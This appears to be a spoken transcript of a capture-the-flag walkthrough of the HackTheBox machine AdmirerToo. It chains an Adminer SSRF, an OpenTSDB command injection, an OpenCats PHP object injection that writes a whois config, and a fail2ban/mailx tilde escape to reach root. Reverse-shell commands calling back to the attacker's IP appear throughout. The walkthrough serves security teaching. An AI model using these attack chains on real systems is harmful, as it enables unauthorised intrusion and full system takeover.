What's going on YouTube? This is Ipsec. I'm doing AdmirerToo from HackTheBox, and I really like this box because it's got a lot of small applications that have proof of concept exploits out for them, but the application itself is configured in a way that you have to modify the proof of concept to get it working. For instance, the first exploit is an adminer, which is like PHP MyAdmin. There's an SSRF in the login functionality of the application. However, there's a plugin installed that disables login, so you have to craft that login packet manually in order to trigger the SSRF that gives you access to a different application that has a command injection vulnerability. But before the command injection vulnerability, it does something with a metric in the application, and the metric the proof of concept uses isn't in that application, so it errors before it hits your command injection. So you got to do some API queries to pull a valid metric to replace in the proof of concept script. With access to the shell, there's another web server that has a PHP Object Injection that you can use to write files. However, the web directory is not writable, so you have to be creative with how you exploit it, which triggers a RCE and fail to ban. But with that being said, let's just jump in. As always, we start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it AdmirerToo, and then the IP address of 10.10.11.137. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, and it looks like one is filtered. So the first port is SSH on port 22. Its banner tells us it's a Debian server. The next thing we have is HTTP on port 80. It's running Apache and also Debian. The title of the web page is going to be Admirer, and the server header doesn't really mean that much. We've already seen it. We have filtered on port 4242, so we can't access this port. This port is behaving differently, so there's probably an IP tables rule dropping the traffic here. So keep that in mind. So let's just go take a look at the web page because nmap doesn't really tell us too much. So going to 10.10.11.137, and it looks like we have a web page. So the first thing I do, look at the copyright information. We can see it's 2018, which is a bit old. The next thing I want to do is try to find the extension. So I'm going to do index.html, not found. Index.php, it is found. So this is going to be a PHP website. Looking at the source code, the main thing I'm looking for here is something that exposes how this website was made. Maybe I see something that says Joomla, WP-content, things like that, but I'm not seeing anything. I'm just seeing a bunch of probably a bootstrap website. So let's run Pharaohbuster. So I'm going to do Pharaoh. Actually, I'm going to start it real quick. We can do -u, copy this. Let's see if I can get this right. I don't use this tool all that much yet, so bear with me while I look at the help. Let's see, ext, let's see. Oh, I remember, I just did a video. We do, I think, -e or -x for extensions, and we don't want to put a period first. We just do straight PHP, whatever. I think if we update it to the latest version of Pharaohbuster, that is now fixed, but I have not updated it yet, so have to make sure not to do that. So let's copy this URL again, paste it in. I always like the -b to collect backup, so when it finds index.php, it tries like .index.php.swap or something for vim files, .back, a bunch of backup potentials. So I always like adding that. It doesn't really add that much to your word list because it only does it for items it actually found. Then we do -x for extension, PHP, and the final thing I like is output. And I'm just going to call this dirbus.out. And we're going to let this thing go. We can take a look at the page itself, maybe check a robots.txt, even though nmap should have told us. I always just double check this. And we get a not found message. And this is a link. And the link on this is actually exposing where it emails to. So we have a host name, admirer-gallery.htb. So let's go and add this to our host file. So sudo vi etc host. We can say 10.10.11.137, paste this in, and then go to admirer-gallery.htb. And it's the same exact website. So the next thing I'm going to try is a virtual host enumeration. So I'm going to run Gobuster for this, do vhost, and then -u We can put AdmirerGallery.htb, word list, op, sec list, discovery, DNS, and I just do like subdomains, top 1 million, 5,000 is fine probably. So let's run this and see what we have. And it is going a bit slower. That's probably because Buster is running, and this tool is very fast. So when you run it, your connection may slow down. So I'm just going to kill this for now to speed everything else up. And we do have one hit right now. That's db.admirer-gallery.htb. So let's take a look at this one. So sudo vi etc host. And we can add this. Going to this link, we have Adminer. That is Admirer, so similar names. MySQL database, if we click enter, we log into the database, I guess. So this looks like a PHP myadmin type of interface. I don't know exactly what Adminer is. Looks like we are Admirer read-only potentially. So if I go to gallery, we have things, let's see, select data. So we can see things. It doesn't look like we have any credentials. I don't know how to use this user interface, but we have this SQL command. So let's try this out. And I wonder, I am on, so I guess this just isn't supporting dark mode. I can do show databases, I believe. Execute this. We have this. So let's see. I wonder if I do show tables if I'm already in this database. I am. So I'm in the Admirer database. We can describe gallery to see this. And we have no password field. So we already saw it. We could do like select star from gallery if we really wanted to. And run this. And we just get the data. So nothing interesting there. The other thing I like checking for when I have SQL is select one into OUTFILE. And then we can do like temp ipsec to see if it writes something. Execute this. Access is denied. And this could be because we don't have the file privilege. It could also be we don't have permission to write into this directory, which is becoming more and more common because there's something called like a secure file priv in MySQL. So I just want to try writing to like verlib MySQL files test because I think this is the default allowed directory for MySQL to be written to. And there's also like AppArmor, things like that. So there's a lot of things that prevent MySQL from just writing to files, and that's why typically you don't see me using like SQL map OS shell type commands because I don't think it's really been updated with the times maybe. I just like doing things manually so I know exactly what's happening. And I can try to test for these small use cases. The next thing I probably want to do is a load file command. So select load file, and we can try etc pass wd, and then execute, and we get null. So it doesn't look like we can read files either. So at this point, I'm going to go for enumerating the version. I'm guessing the current version is 4.7.8. And the latest is 4.8.1. If I click this link, we go to a download, and it looks like the latest version is indeed 4.8.1, but we're probably running 4.7.8. So, I mean, if we were running 4.8.1, I have no idea why 4.7.8 would be shown. So, let's do adminer 4.7.8 exploits and go to Google real quick and see if there is anything. We have a server-side request forgery. And this is interesting because I'm thinking back to the nmap. We have port 4242 filtered. And like I said, it's probably IP tables blocking us. So if we do a server-side request forgery, we can access that port on localhost, which will probably bypass that IP tables rule. So let's go to the security advisory, see if there's anything here. Trying to get details. And it's Elasticsearch and ClickHouse of this. I didn't see anything Elastic on Adminer. So looking at this advisory, open in Firefox, and let's see, copy the Python script, and looking at this Python script, it's a redirect like it's redirecting things. It is written in Python 2 because it's a simple HTTP server. So when we run this, we're going to make a Python 3 version because I don't like Python 2. But I don't see any exploit code here. All this is probably doing is Adminer makes a request to us. We send a redirect back to it and direct it somewhere else. If you've watched like my Jarmus video, it's a box I had created that looks like it's a similar attack so far. So here we have a login, and what? We didn't get a login when we access this. So if I go to db.admirer-gallery, we just have enter, and we got server whatnot. Let's see. I'm going to run Gobuster on this, and the reason why I'm running Gobuster, not Pharaohbuster, is I don't want to recurse into directories, and I don't remember the syntax off the top of my head to not do that. So this is going to be quicker for me, right? So web content, what is it? Raft small words dot text, and there we go. We have a plugins directory. So if we go to /plugins, one-click login, plugin.php, data. If I search this with Adminer, maybe this is a plugin. We need to make sure this goes to Google. And yes, this is a plugin for Adminer, it looks like. So I'm guessing that's what this button does. And the normal login is probably going to look like this, where we have to enter credentials. So this is a bit unique. If I intercept this in burpsuite, we go to target proxy intercept is on, click enter, and we have credentials. We have admirer read only, and I want to be admired, and then 2 exclamation point. So we have some type of password here. I'm guessing if we follow and do the SSRF, so 10.10.14.8, putting it there where it was localhost, we should listen on port 80. We forward this along. We don't get a hit. So we probably have to do something else to do an Elasticsearch login. And we could probably guess this. It's probably going to be, let's see. If we go here, if you look over here, we have auth driver server. It's probably going to be in this parameter. But what I generally do is always test it against, like, I like spinning up software and then testing it locally. So, man, my dark mode plugin's really not working, but besides the point. Let's see. Adminer Docker. We can just Google this. Go here. Did I turn it off? No, it's on. Okay. And we can do a pull. Let's see. Just Docker pull adminer. And I have Docker installed, so I can do sudo docker. I already copied the whole thing. Do this. And it is installed, so it didn't actually download. And you can just do Docker run, right? So Docker run, and then map the port with -p. So I do sudo docker run -p. By default, it's showing it runs on port 8080. I don't want to do 8080 because that's where burp is. So I'm going to do 8081 maps to port 8080. This is localhost going into Docker container on port this. And we do adminer. And it looks like it is started. So now if I go to localhost 8081, we're here. And we can see over here all my GET requests. So we're definitely accessing my version of Adminer. I can click this, see the different login types, and we have Elasticsearch. So if I examine this request, let's go proxy, intercept on, put stuff in this. We can see the driver is Elastic. So that's what we want to change. So let's go back to this page. I am intercepting, enter, change server to Elastic, change localhost to 10.10.14.8. And then are we still listening on port 80? We are right here. I can kill that Gobuster. Oh, we can kill that Docker as well. So I'm going to forward this request. And it makes a request to us. Authorization, this is probably just going to be the password that we saw, although it looks pretty small. It didn't put a password at all. So we have the server-side request forgery now. So the next piece is we have to do a redirect. And on the official GitHub script for this exploit, it was Python 2, and I didn't like that. So I'm just going to Google Python 3 HTTP server redirect example, maybe, and see if we can find one. Let's see. Simple HTTP redirect. This is, again, using simple HTTP server. I don't think that's a Python 3 thing. So let's see. Is this going to be it? Here we go. We have this. So I can v redirect.py, paste this, and we can test this out because it looks like argument 1 is going to be a port, and then argument 2 is used for the redirect. So if I do sudo python 3 redirect.py 80, and I'm going to say google.com, and if I test this out with a curl-v 10.10.14.8, we see I sent a redirect to google.com. We can see my server header, whatever, but everything looks like it is working swimmingly. So what we want to do is try redirects on this application. So I'm going to try etc passwd to see if I can get this to redirect and give me a file. So let's go back to adminer. Where am I? Log in. Let's see. Proxy intercept. Log in. Go to repeater and change this to elastic, and then the server 10.10.14.8. Send it. We get a found, refresh. We didn't get anything. That's weird. Let's see. Elastic 10.10.14.8. Forward, turn intercept off. And oh god, it's getting a bunch of things. You can see it's just I don't know. There must be some type of bug maybe in the server, but it's just trying it 100 times. So oddly enough, it didn't like when I did it in the repeater window. So I guess maybe there's some JavaScript that it submits. So in order to make this a bit easier for me, I'm going to just do it all the time in the browser, but I don't want to hit do the edit 50 times. So I'm going to go into burp options and go down to match it and replace. I'm going to say request param value and say anything that is localhost, change it to 10.10.14.8. And then I'm going to add another one. Let's do another parameter value. This one's going to be server. And I'm going to change that with elastic. So now, as long as my request goes through burpsuite, when I click enter, it's automatically going to change those parameters for me. So if I run this again, just hit OK, and then it works. We can see it's using a file get contents, but it's doing http://. Well, that is getting to me. I'm guessing this is hiding the credentials, but I don't know why I can't redirect into the file wrapper. Maybe PHP just doesn't support that. We could try the PHP wrapper, I think it's filter convert dot base64 encode resource is equal to etc passwd maybe? I think that's right. Click it again, and it's doing that same weird behavior. So I'm going to direct this to HTTP localhost. Let's just direct it to itself and see what happens. And right off the bat, we're just getting the HTML source code of that very first port, port 80, that like static website. So nothing too interesting. We can change this to be 4242. I'm going to just clear my screen. Then we click login again. And we have something else. We have OpenTSDB. And it's also telling us we must be running JavaScript. So let's look at exactly if there's any exploits for this. So OpenTSDB, exploit, go to Google. Remote code execution, very first result. Looking at this, it looks like we may have something right here. So let's try copying this parameter and just seeing what happens. I'm going to leave it with the touch because I just want to see what happens here. So I'm going to do, does this use single quotes? It's using single quotes where the system command is. So I'm going to put this in double quotes. There we go. So oddly enough, there's no space here. So I don't know if that's going to break something or not. But we can run this. Then we go back to the login. Click enter. And we get a big ol' Java error message. So going down to the bottom, what can we see? No such name for metrics. sys.cpu.nice. So this is an interesting error message from this application. If I copy this, going over to Google, see what we have. I know it's not even getting to the RCE portion because like this is a Java error. It would say like can't write file, something like that, I believe. So we want to fix this metric issue first. And I'm not really seeing anything in here. So let's see if we go here. Not seeing much. Let's see, this is still using syscpu. Auto create metrics. So we probably want to look more into this application. So I'm going to look at OpenTSDB API Documentation to see if this even has one. It does. And the reason why I'm using APIs is because right off the bat, when I tried to access this website, it said JavaScript is required. APIs don't require JavaScript, so I should be able to access this no problem. Verbs, we can only use the get verb in our SSRF, unless maybe we could tunnel Gopher or something through this SSRF request, but I don't believe we can. Mainly because I couldn't even do the file parameter, so I'm not even going to try Gopher. So we have this API endpoints. We have query, search, serializer, stats, suggest. I'm going to see what suggest is. And API endpoint provides autocomplete. So for example, passing type metrics qsys will return the top 25 metrics that start with sys. So this is pretty cool. So if I go to /API suggest and type metrics, what if I don't specify any query, if it just gives me all the potential things? If it doesn't give me all the potential queries, then I'm going to have to like start brute forcing things. So I'm going to go with like, give me everything that starts with A, give me everything that starts with B type deal. But let's just run this. So we're now going to redirect to API suggest, type metrics. And if we looked at our POC, our metric does have that syscpu nice. So that's the string we want to change. So change my redirect. Let's go log in again. We hit it, and we have http.stats.web.hits. So I'm going to copy this, and we can go back to this, and we will replace the metric with one that exists. Hit enter. It got it, and we have output. So the first thing I want to do is try a ping. So let's do system, and I'm going to ping -c 1 10.10.14.8, and then we can do sudo tcp dump -i ton 0 icmp. I'm gonna add the -n so we don't do DNS resolution. Click OK. I did not redirect. There we go. We get invalid credentials, which isn't what we got before when the last thing. So if I run this, let's see, if I do curl-v localhost, we can see this location has spaces, which is not a valid URL. So we have to URL encode these spaces. I wonder if we can do pluses. It's either plus or %20, or it's both. So I'm going to try pluses first. And then if I make this request, we can see the spaces have turned to plus. Run TCP dump again, click enter, and now we have pings. So I think we could have also done %20 as well, and that works. Both those are a space. So if I do %20 there, just because I'm lazy, I didn't want to do it the 4 times it existed or whatever. 1%20. I wonder if we can't like mix it. I swear when I originally did this box, I used %20, not plus. So ping 20c1 20 IP. Okay, let's try this. Click enter. Get. Huh. Okay, we'll just do spaces. Pluses. Maybe that's what I did. Maybe I screwed something up. Let's do that. Plus, plus, plus. Go. Oh, shoot. I did screw something up. No, I didn't. That's right. Let's see. There we go. Enter. Hit. This definitely pinged us. I am so confused because I used the up arrow to generate this. Huh. I'm not sure what's going on. It's not a first, but that is definitely bizarre. I guess we can try a reverse shell. What's the worst that can happen? It won't work. So --c. Let's see. I don't need to do --c. I can just do this because I'm going to base64 encode this. So dev tcp 10.10.14.8 9001 0 and 1 like this. That looks right. Base64 wrap 0, and I'm definitely going to make my base64 alphanumeric. Just alphanumeric, getting rid of all the special characters. I think I just did that. Let's see. I'm going to copy this, and I always, when I make those types of changes, I'm just going to run this myself real quick. So if we do this, get a shell, shell works. Okay. So we can do echo plus that, pipe it over to base64 plus -d, and then bash. 9001, run this, hit enter, and we get a shell. So I'm going to do Python 3 -c import pty, pty.spawn bin bash, Control Z, stty raw minus echo, fg, enter, enter. And we can export term is equal to xterm, so I can clear the screen. Normally at this point I'd run linps and just look at the output, but it's not really that exciting to do it every video, so let's just take a look at the pastwd file. Looking at all accounts above 1,000. So we have my account. I don't know what HBase is. It's running in opt HBase. So if I look at that, I don't know what it is. We have whatever that guy is. MySQL, Jennifer. Jennifer has bash. Exim. So we got a mail server here. I don't think this is default on every Debian box. I don't know. I haven't looked at a lot of Debian boxes. And this is something that I like. I mean, people can get dependent on running enumeration tools, right? That just tell you what to do. But when you look at it in chunks and do things manually, you notice things like this. Like, huh, has this Debian exim always been on these Debian boxes? I don't know, because I guess maybe it's just me, but I'm looking at smaller chunks, so I notice more things. And when I ask these questions, the next time I go in a Debian box, I'm going to look at it and see if that stands out. I'm guessing exim 4 is not a default package, so this probably stands out as being important. We also have the devel user. He has no logon or no login. We can cat etsy pass wd grep for everything that ends in sh. Put it in quote. Oh, like that. And we have just bash and Jennifer. I'm guessing Jennifer is where user.txt is. Only users can read it. If I do a groups, I am not a member of users, so I cannot read home Jennifer user.txt. So we probably want to get there. And what I'm going to do first, let's go into this opt directory. We have OpenCats and HBase. We exploited OpenCats, I believe. Is that what we did? What was this? See, we did that. Let's see. Oh, we did OpenTSDB, not cats. But let's see. Is there anything here? We have a DB. If I cat, we got SQL. Let's see. Find dot grep config. There is a config.php. Let's less this. Is there a password in here? Forgot password. Demo login. Let's see. grep-i pass config.php. Okay, let's see. I do not see anything. Maybe this isn't running like MySQL. Find.grep SQL. I'm not sure how this is exactly running. It's definitely got a database. Let's see. Let's go to Etsy Apache. We have our own Apache configuration for OpenCats. That's weird. What's in just the regular Apache? Sites enabled. Default. Let's see. DB. var /adminer. So let's just take a look at adminer's config real quick. Let's see. 3 files. What's in plugins? So now we can look at this data directory. And there's servers.php. And we have credentials to something. So we should have tried this credential first for the user. So we can do su-Jennifer, try this password, and that one doesn't work. We did see this one when we intercepted the request. So the plugin is reading data out of this server.php and just auto-inputting it, right? And the reason why I'm not using the username admirer, because we looked at passwd and knows that doesn't exist. If I su, boom, we have it. So I'm going to leave this shell up. Let's see, we can kill this session, kill this session. But I always like getting a SSH shell when I can. So Jennifer at 10.10.11.137. Paste in this password. And now we have a better shell. And if something happens to this, we still got that netcat session to fall back on. So I'm not exactly sure what this Jennifer user is. We can look at the home directory. We got the user.txt, but there's nothing really here. I'm going to do a find dash find/-user Jennifer, and then pipe errors to dev null, just to see what there is. We probably don't want proc, and let's see. Can ignore proc and run. And we'll do sysfs. So there's not really much. We have PTS because we're SSH'd in, and then just my home directory. I'm going to try, let's see, if I do groups, I'm a member of users. So I'm going to do -group users and see anything and nothing, just this. So this shell doesn't look like it bought me anything other than user.txt. So I'm kind of at a loss what to do. However, there was the OpenCats that I saw in opt and hbase. If I do a sslntp, we do have port 8080 open. And if I looked at Etsy Apache 2 -OpenCats, I don't know why there's two like Apache configs. This could have been done like in multiple sites, but it's probably a reason. We can see virtual host 8080. And going down, that is it. So let's see what else is in this. So if I go in this config, let's look at apache2.conf. Let's see, I'm going to diff this Apache and the other Apache. And this is probably why there's two different Apaches installed. So, I mean, like, to me, when I look at this, if we look at the other Apache config, this may make more sense. So, // Apache 2, sites enabled. We can see there is a site on port 80. And then if we go down past this, we have another site on port 80, but this one is for db.admirer-gallery.htb. I was kind of curious why they didn't do virtual host port 8080. So that's why I did the diff against the configs to see if Apache was configured differently. And we do see in the OpenCats, Apache 2 is configured to run as the user devel. So the users that are running Apache is different. If we do ps-ef, is it -force or -force? Probably --. Maybe I can't see. I don't think I can see other people's things. Mount, grep, I forget what it is. There's a mount option you can do to hide the PID. Oh, there it is. So hide PID is set to 2. So users on this system can't see the processes of other users. That's what hide PID is. I guess we should just forward the port then. So I'm going to begin my first line with squiggly C. You can see I can type that there, but if it's the first character entered on a line, we have that. I'm going to listen on port 8082 because I already used 8081 for something, and then do localhost 8080. So this way, on my local box, whenever I send a request to 8082, it's going to send it through SSH and going to localhost 8080 on the other end. So now I can do localhost 8082, and we have OpenCats. And it tells us the version. I really like when applications tell me the version there. So we can do OpenCats version. Let's see, do this. Exploit. And see if there's anything. It looks like there is a PHP Object Injection. And it is an authenticated one, most likely. I bet if I actually read this, it would. Let's see. Auth. It's not saying it, but this page makes it look like it is authenticated. So we just try logging in. We can try like admin. Maybe we could go view the config. But the first thing I'm going to do, let's see, SSH gen. I should have taken a better note of that password, but I'm just going to copy it. I'm going to try logging in with the credentials we have. So Jennifer, paste this in. and we can log into OpenCats. So that is good. Should go through the exploit. So we send a request. Let's see. I'm guessing this is a PHP object right here. Talking about it's unserializing to data grid. We can do a pop gadget chain with guzzle HTTP, and it can write files to the system. So let's see. They're giving us PHP gadget chain collection, I think that's what it's called, and giving us the command to use. And it's writing to var www public shell.php, but we don't want to write there, right? Because that's not where this web server is. We want to get to the devel user, and that is in, I think, opt. Yeah, cd opt. And, OpenCats is owned by root. So I don't know if we'll be able to write any files here. Let's see, find dot dash writable. So this is going to see if there's anything world writable in this directory. There isn't. Let's see, dash user devel. Nothing's owned by the user devel. He's also in the group devel, I believe. If I can spell that correctly. We have install block that's owned by the group devel, but the group can't write to the file. So we can't write a web shell into this directory. So this whole PHP gadget chain isn't going to help us right now. So we have to do some more enumeration on the box. The first thing I always think about is like SSH keys, because if we can write an SSH key, then we can log in. But if we look at devel, he has no login. So writing an SSH key won't really help us. We could still do like port forwarding. However, we can do that with the Jennifer account so it doesn't buy us anything. We could use SCP most likely to download files. So I'm going to do find /user devel and then hide error messages. So dev null. And we don't have anything. So let's try group as well. And we know this install block, but we have user local source and user local etc, which is weird. If we look into these directories, so let's just copy this, paste, they're blank. Let's do user local and source, devel can write, and etc, devel can write. Whenever there's local, that generally means this is going to be a user managed thing, so package managers don't really touch those directories. So that's interesting. If we go to var log, we can see, let's see, what software is installed. PHP, we have OpenTSDB. We can't read a lot of these files, but it's still helpful because we can see like exim4, we have fail2ban. And I do remember fail2ban had an exploit in the news somewhat recently. So I'm just going to Google fail2ban exploit, go to Google, and we have this post once it loads. And I'm going to skim it over. It's an exploit when it does whois. So fail2ban, that little clip is annoying, but I can't highlight it. We see that action ban, it's doing printf and then printing out a message. And the key piece is it's going to print the output of this whois command. Now, what this is saying is the mailed binary, if the line begins or you have this squiggly exclamation point, it will execute the command. So what we're going to do here is hijack the whois and then change this output to execute a command. So that is essentially it. We could do like a, let's see, fail2ban server -v maybe. That didn't work. Let's see, -h, there's help. We can see it is version 10, 0.10.2. I'm sure one of these posts will tell us that is vulnerable, but I'm not going to spend too much time there. You should always enumerate versions. So we have a piece. We don't know what like the whois config because it's probably in like whois.conf here. Doesn't exist, but we couldn't write to that directory. However, we can write to the user local etc directory, which maybe that's where whois is. I'm going to run an strace and do whois 10.10.14.8, or we can do 127.0.0.1. It doesn't really matter. The main thing I'm looking for is this output because we can see everything the whois binary is doing. Most importantly, we can see like any file open that fails, right? So this is opening etcresolve.conf, doing probably a DNS lookup, ns switch, and here it is. We have it opening user local etc whois.conf. No such file or directory. So awesome. The devel user can write to this directory. So we can create a whois configuration file to point whois commands at our box, which then we can respond with to have the fail to ban fail to ban to actually execute a command when it does the whois. So it's a bit of a tricky concept, but the first piece that we need to do is be able to write a file into user local etc whois.conf. So we go back to the OpenCats exploit, and we want to use this PHP gadget chain thing. If you just do that GitHub, you can find it. I probably have it installed in opt already, so you can probably just git pull this thing. So I'm going to copy this, and we'll copy it up until where we store the file and then the file we want. So I'm going to go on my host, and we can do it in a new pane. I'm going to do exploit. I'm going to put ipsec was here and save that because I just want to write this first. If I can write that, then we can change it later. So opt php cc. We have that. User local etc. I'm going to do test. We'll change it to whois.conf once we're done. And we can write this exploit. Okay. And then how do we do this? PHP object goes there. So let's copy this whole piece. I'm going to make sure I'm still logged in. I should be. And I need to put the / here. And copy this, paste, and then let's do ls user local etc. So nothing exists in this directory. Hit enter, and we have test. So if I do test, we have a file. And now the bad thing is, it didn't write our input at the beginning of the file. So like if we try to write a config file here, this probably isn't going to work because you got this JSON ahead of it. So we do have to do some trickery here. And before we get into this, the best way to go about this is probably to look at the actual whois source code to see how it does something. Or we can like do an example whois.conf so you can see what it should look like. So we have this, and the configuration file is something, and then this. So at a quick glance, this looks like a regular expression. It's escaping a period and saying AARP, and then this is terminating the string and whois. So if this is indeed a regular expression, and this is where the request goes, we can probably just put an IP address here. We don't need host names. Those are usually interchangeable. We may be able to change a request actually, because in regular expressions, what's in between a bracket is an or, right? So what we're going to do is we have this, right? And if we put a bracket here, then this is still going to match. We just like terminated the regular expression. Think of it like when you do an SQL injection, you add your single quote to terminate the query. this is very similar. We just terminate the regular expression with this, and we have IPSEC was here. And the only issue we have now is what is at the end of this. So somehow we have to get rid of this information. And this is where examining the whois source code comes in handy. So if I just Google whois source code, let's see, intelligent whois client. Oh God, whois.c. There we go. I believe it's going to be in this file somewhere. Let's see. Where are you? So handle query. Let's see. Match config file. This is what we want. So the delimiter is going to be a space or a tab. The buffer is 512. So if we give it over 512 probably, it's going to break. Let's see, how is buffer used? Where is this? Buff. Oh, so fgets. I was hoping it would highlight everything, but yeah. So we're getting the config file here and only getting 512 bytes. So we could test this theory out. Let's go back to our gadget chain. Let's see. Where is it? We called it exploit. So I'm going to do Python 3-c. Oh, it's hard to test that actually. Because it's not when we write the file, it's when the whois binary is reading it. But we have that. It's got the regular expression here. So let's just try that real quick. So we know whois is going to be a regular expression, and we know it only reads 512 lines. So what we want to do is print a closed bracket and then a star. So this is going to match things. And then 10, 10, 14, 8, 10, 10, 14, 8. And then we want to print 500 spaces. This number doesn't matter. We just want to go over that 512 character buffer. So if I write this to exploit, if we look at this, we just have all this data. So remember, this bracket star is just terminating the regular expression. If we went back to the whois.conf, we see they're just starting with \period, but we're just ignoring, like, using this to break our JSON. And then when someone looks up 10, 10, 14, 8, we probably could do like another star or something. So when they look up anything, but I'm just going to put my IP here. So when they do a whois on 10, 10, 14, 8, because the failed or ban is going to block us, and that does a whois on our IP to see who we are, to put it in the email saying, hey, we blocked this IP. Here's the information about it. And then we're telling it the location of 10, 10, 14, 8 is us, so we can respond to it. And that's where we're going to print that message, then do the squiggly exclamation point to do command execution. So that is a long chain, right? Let's do this whole gadget chain thing again. And this time we're going to do whois.conf. We can copy this piece. And whois, I believe, is on port 40. It's either 43 or 42. But we're going to run a whois first just to make sure this is working. So we send this file. We go back to our shell. And we can cat this echo. And we see it looks good. Again, this regular expression should be terminated. And then whois is only going to grab 512 bytes. So it's going to grab like up to here and then see this, right? So sudo nc lvnp 43 whois 10, 10, 14, 8. And we see it makes a request to us. I guess I should have ran that before so you saw it wouldn't make the request otherwise. I bet I could do... Can't parse that line. That's odd that... Let's see. Do this. I wonder if... I'm going to challenge my understanding of this because I'm partially making stuff up as I go. So I'm going to say 10.10.14.4 here. And we're going to send that to 10.10.14.8. Let's see what happens here. So making this up as I go. Hopefully my understanding of this is correct. If not, you'll be as confused as I am about who is this legacy protocol. But hopefully this works. I didn't actually test this. So yeah, I do whois 10.10.14.4. It still gets to us because we're directing that request to us, right? So that is good. Now what we have to do is the actual exploit. So I'm going to do like, let's see. Do they give us an exploit in this post? Let's see. Next line. Be executed. So they're just doing a file and then like that. Okay. So we can do it this way. V, we'll call this fail to ban. And then I'm going to call this please subscribe. We don't really need anything here. Then in line break, squiggly enter, like that. Yep. And then we can do --c, --i, dev tcp 10.10.14.8, 9001. I'm kind of curious if this works because we do have some bad characters in here. So that looks better. So now if I nc lvnp 43 pipe fail to ban in me, sudo, and we probably want to ssh 10.10 11.137 nc lvnp 9001, and let's see. If I look at this, that is still there. Oh, we need this to be 10.10.14.8 because it's going to look up my own IP address. So we need to revert this. So 10.10.14.8. Go like that. Because fail to ban is going to run the whois 10.10.14.8. If it was left at 10.10.14.4, it wouldn't work. So do this. Copy this payload. Go to OpenCats. Paste. .10.10.14.8, that is good. 43. It was 43, right? Yes. Okay. So let's get blocked. Wow, only took one attempt and we got blocked. And we have the root shell right here. So success. If we cat root.txt, we have it. So hope you guys enjoyed the video. Take care, and I will see you all next time.